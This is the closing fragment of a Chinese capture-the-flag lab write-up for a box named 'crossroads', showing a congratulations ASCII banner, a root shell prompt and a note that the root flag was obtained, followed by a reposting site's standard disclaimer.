░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@crossroads:~# 

root@crossroads:~# 

成功拿到root flag

原文地址:http://www.cnblogs.com/jason-huawen/p/16897851.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性